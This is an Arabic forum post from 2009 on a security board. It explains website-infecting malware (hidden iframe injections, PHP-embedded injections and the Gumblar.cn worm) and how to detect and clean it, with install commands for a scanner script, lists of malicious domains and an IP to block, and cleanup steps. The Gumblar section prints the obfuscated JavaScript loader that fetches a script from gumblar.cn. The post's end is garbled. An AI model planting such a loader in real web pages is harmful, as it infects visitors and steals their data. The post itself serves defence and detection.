التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـحـمـايـة ~ Security .:: ] > حمـــاية السيــرفرات والمواقـــع > قســم تطويــر المــــواقع

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-05-2009, 08:42 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
xman2
:: RSS Account ::
 
الصورة الرمزية xman2
 

 

 
إحصائية العضو







xman2 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
xman2 is on a distinguished road

افتراضي [ خبـر ] : فيروسات امواقع وطرق اكتشافها والحماية منها من توب لاين


<div><div align="center">

فيروسات صفحات الانترنت ينتمى الى ما يسمى website exploits و هى المنتشرة اليوم فى الانترنت وهى الاكثر ذكاء فى الاستخدام فبعد ان كان الحق او التلغيم يتم بشكل يدوى فى اثبح الامر الان اكثر تطور وسرعة وايجايبة من حيث عمل الفيروسات
فيكفى ان يصاب موقع على سيرفر لاستضافة مشتركة حتى يبداء الفيروس فى العمل
المصدر الى الان صينى للفيرس وينقسم الى عدة انواع

ولاكن كيف يتنقل الفيروس و طريقة عمله هو او فيروسات exploits الاخرى ؟!
ببساطة عند اصابت حاسوبك بالفيروس من خلال تصفحك لاحد المواقع المصابة فان الفيروس يخزن فى
sqlsodbc.chm

ليبداء عمله فى جمع جميع البيانات المحفوظة فى متصفحك او الملفات المؤقتة لك لذا لا ننصح بعمل حفظ لكلمات المرور فى متصفحك وبمجرد استخدمك لملفات البى اتش بى ورفعها على موقعكم من جهاز مصاب فان الفيروس يزرع نفسه بتلقائية فى الملفات ليبداء فى الانتشار عن طريق متصفحى موقعك وهكذا ينتشر بسرعة شديدة كما انه ينتشر ايضا فى المواقع المضافة على نفس الخادم

وبالنسبة لاصحاب الخوادم لفحص وجود الفيروس على الخوادم اتبع الاتى :

يمكنكم تحميل الاسكربتات الاتية على سيرفرتكم وهى خاصة بتوب لاين من م / حسام



وشرح تركيب الاسكربت كالتالى :

رمز PHP:
wget http://www.mtwer.com/shro7at/VCleaner/vscan-v1.1.tar.gz



ثم فك الضغط

رمز PHP:
tar -xzf vscan-v1.1.tar.gz



ثم نقل الاسكربت الى هذا المسار


رمز PHP:
/bin

mv vscan
/bin



ثم اعطائه تصاريح 755


رمز PHP:
chmod +x /bin/vscan






ثم ستقوم بتشغيله بالكتابه فى محث الشل فى اى مكان



رمز PHP:
vscan




رمز PHP:
vscan
[root@server ~]# vscan




وتابع معه الخطوات كما فى الصوره


[IMG]http://www.tl4s.info/******/hossamscript/virus-cleaner_files/vscan1.jpg[/IMG]



للمزيد من المعلومات والاوبشنات كما فى الصوره



[IMG]http://www.tl4s.info/******/hossamscript/virus-cleaner_files/vscan2.jpg[/IMG]




============



شرح وتركيب منظف الفايروسات الغير ثابت (داينامك) : Dynamic Virus Cleaner v1.1

طريقة التركيب مثل السابق لكن مع اختلاف اسمه الى dvscan
وهو مشابه للسابق كثير لكن بدل من ان تضع كود الفايرس كامل فى منطقة Put the virus code :

سوف تضع اسم الدومين فقط الموجود فى كود الفايرس مثل nyoflak.com فى مثال الكود السابق مثل الصوره التاليه


[IMG]http://www.tl4s.info/******/hossamscript/virus-cleaner_files/dvscan.jpg[/IMG]


================================================== ========== ================




اليكم أهم انواع هذه الفيروسات :





اولا فيرس ****** :



هو فيرس يستخدم وسوم****** وهى من احد ادوات لغة html ويصيب الفيروس الزراير بالصفحات ولاكنه يصيب فقط الصحفات ذات الاسم المشهور ا ى index.html او index.php او Index.htm



وهكذا والجدير بالذكر ان اكثر من 95 % من المواقع المصابة بالفيرس تستخدم برامج تمت برمجتها باستخدام php


و ما يميز فيروسات ******s هو الاختفاء اى خاصية (hidden) فان قمت بمحاولة ان تكتب كود يحتوى ****** فسيظهر الكود بالصفحة بكل بساطة ولاكن الفيرس يتميز بالاختفاء فلن يتم اكتشافة بالعين ان لم يكتشفة مضاد الفيروسات




النوع الاول من فيروسات ****** :



******s from .CN Domains :



وهو يستخدم وسوم ****** بصيغة Html عادية ويكون الشكل كالتالى :



رمز PHP:






يمكن ان يكون النطاق الموجوود بالكود المرفق اعلاه مختلف ولاكن جميعها ينتهى بـ

.cn
ورقم
ip

94 .247 .3 .150



لذا انصح بعمل حظر له من مدراء الخوام

وقد يختلف مسار تحميل الفيروس ولاكن جميعها بالشكل

“in.cgi?incomeNN”


وهذه قائمة باغلبية النطاقات الجاملة للفيروس :

lotultimatebet .cn
lotmachinesguide .cn
cheapslotplay .cn
lotultimatebet .cn
cutlot .cn
mediahousenameshopfilm .cn
betbigwager .cn
namebuypicture .cn
thelotbet .cn
hotslotpot .cn
mixante .cn
lotante .cn
superbetfair .cn
litecartop .cn
betworldwager .cn
litecarfinestsite .cn
homenameregistration .cn
litegreatestdirect .cn
playbetwager .cn
nameashop .cn
mainnameshop .cn
superlitecarbest .cn
internetnamestore .cn
dotcomnameshop .cn

mediahomenamemartvideo .cn




كيفية العثور والكشف على موقعك ومدر اصابته:




يمكنكم بسهولة زيارة موقع Unmask Parasites.


وكتابه موقعك ليعمل الموقع على الفحص وكتابة الروابط المصابة


وقامت عدة محركات بحث مثل الشهير جوجل بعمل حظر لبعض هذه المواقع وذلك للضرر المسبب له وهذا رسم يوضح ذلك :




كما انه من الجدير بالذكر ان هذا الفيروس يصيب ايضا ملفات Adobe Acrobat المحملة على موقعكم وملفات الفلاش swf



ولاكن قد تكون نسبة الاصابة قليلة نسبيا بالنسبة لاصابات ملفات html & php





والان طريقة تنظيف موقعك :

1- ابداء اولا بحاسوبك يجب عليك عمل فحص بمضاد فيروسات قوى على حاسوبك باكلمه ضد الفيروسات وملفات التجسس
2- بمجرد تأكدك بنظافة حاسوبك قم بتغير كافة بيانات الموقع باكملها واحفظها فى مكان سرى
3- قم بتحميل الملفات على حاسوبك واحذف الكود يدويا وبلغ مستضيفك بأن يفحص الموقع
4- اذا تم حظر موقعكم من جوجل اتجه الى ادوات اصحاب المواقع Webmaster Tools
5- قم بالتاكد من خلو موقعكم عن طريق موقع الفحص Unmask Parasites
================================================== ========== ================




ثانيا : فيروس ****** (php exploit)



وهو نفس عمل السابق ولاكنه اكثر تطورا فى شكله حيث انه يدرج نفسه ضمن وسم php



وشكل الكود كالتالى :


رمز PHP:
define('WP_USE_THEMES', true);
require(
'./blog/wp-blog-header.php');
echo
"";
echo
"";
echo
"";
?>


نلاحظ وجود نفس الكود السابق ولاكن مع تضمينه ضمن وسم php

والكود السابق من اصابة لمدونة wordpress





والتالى من اصابة لمجلة جملة الشهيرة


رمز PHP:
// Generate the page
//
$template->pparse('body');
include(
$phpbb_root_path . 'includes/page_tail.'.$phpEx);
echo
"";
?>


وهذه قائمة النطاقات الحاملة للفيروس :


xtrarobotz .com

goooogleadsence .biz
internetcountercheck .com
google-ana1yticz .com
live-counter .net
nipkelo .net
hosttracker .net
durnosy .com
ibalefo .net
nyoflak .com
peskostruikaz .com
bukirda .com
thedeadpit .com
sefauro .net
vafuiek .com
deisvop .net
webexperience13 .com
beidzan .com
klaomta .com
quoasty .com
niklejo .net
ruisjop .com
nakulpi .net
clifedo .net

neglite .com


والان طريقة تنظيف موقعك :



ابداء اولا بحاسوبك يجب عليك عمل فحص بمضاد فيروسات قوى على حاسوبك باكلمه ضد الفيروسات وملفات التجسس

بمجرد تأكدك بنظافة حاسوبك قم بتغير كافة بيانات الموقع باكملها واحفظها فى مكان سرى
قم بتحميل الملفات على حاسوبك واحذف الكود يدويا وبلغ مستضيفك بأن يفحص الموقع
اذا تم حظر موقعكم من جوجل اتجه الى ادوات اصحاب المواقع Webmaster Tools
قم بالتاكد من خلو موقعكم عن طريق موقع الفحص Unmask Parasites
================================================== ========== ================



الان مع نوع اخر من الفيروسات وهو الشهير Gumblar.cn :



لا يعرف طرق انتشاره بالضبط, كما انه اكثر ذكاء خصوصا فى التعامل مع منتديات vBulletin فالفيروس لا يزرع فى الموقع بنفس الطريقة عن طريق زرع الكود فى ملف index فقط


بل يعتمد فى زرع الكود فى ملف config.php وعمل ملفات وهمية بها الكود فى مجلد Image باسماء مثل image.php فعند اصابة منتدى فان الفيروس تكون نسبة اصابته للجهاز اكبر لانه لا يظهر فقط فى الصفحة الرئيسية بل فى كل صفحات المنتدى نتيجة للزرع فى ملف الكونفج وهو الملف الاساسى للاتصال بقاعدة البيانات فعند طلب موضوع او رد او اى استعلام من القاعدة فان الفيروس يبداء فى العمل ويزرع نفسة فى الملفات حتى ان كانت مشفرة




1- و شكل الكود كالتالى :


رمز PHP:
(function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56er s"69on()+"22"2c
"6a"3d"22"22"2cu"3dnavig"61t"6fr"2e"75s"65rAgent"3 bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(
u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(doc umen"74"2e******"2e"69nde
x"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"
79"70e"6ff("7arvzts)"21"3dtypeof("22A"22))"29"7bzr vzts"3d"22A"22"3b"65va"6c("22if
(wi"6edow"2e"22+a+"22"29j"3d"6a+"22+a+"22M"61jo"72 "22+"62"2ba+"22Minor"
22"2bb+a+"22B"75"69ld"22"2bb"2b"22j"3b"22)"3bdocu" 6de"6e"74"2ewr"69"74e("22"3csc"
72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3 d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d'
)
.
replace(jil,xR5p)))})(/"/g);





1-1- والكود شرحه كالتالى : يببداء بدالة function


1-2- الدالة function غير مسماه وذاتية الزرع



1-3- طريقة التشفير غريبة لانه يتم استبدال الارقام الموجودة باوامر فعالة عند بداء عمل الفيروس



1-4- قرب نهاية الكود تجد دالة replace





2- عندما يعدم الاسكربت من الموقع الحامل للفيرس يقوم gumblar . cn/rss/” بتحميل تلقائى لفيرس جديد تلقائيا





3- يصيب الفيروس غالبا الملفات قبل وسم وان تكررت فى الصفحة الوسم قد يصيب الصفحة اكثر من مرة وقد حدث هذا اكثر من مرة





4- يختلف عن فيروسات ****** فى انه يصيب كل الصفحات وليس المساماة بـ index فقط





5-يصيب ملفات الجافا سكريبت .js وان كانت تحتوى على زراير فقد يصيب الفيروس كل زرار بالملف





6- قد يكون شكل الفيروس كالتالى
<div style="margin:20px; margin-top:5px"> رمز PHP:
<div class="alt2"> <div dir="ltr" style="text-align:left;"> <span style="color: #000000"><span style="color: #0000BB">


F ofJv D : tdv,shj hl,hru ,'vr h;jahtih ,hgplhdm lkih lk j,f ghdk

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
اسطوانة التعرف على أساليب اختراق المواقع على العنكبوتية والحماية منها z3r0 b0mb3r قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 0 08-03-2010 06:54 AM
[ خبـر ] : فيروسات المواقع ؟ support قســم تطويــر المــــواقع 0 06-22-2009 06:51 PM


الساعة الآن 09:13 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0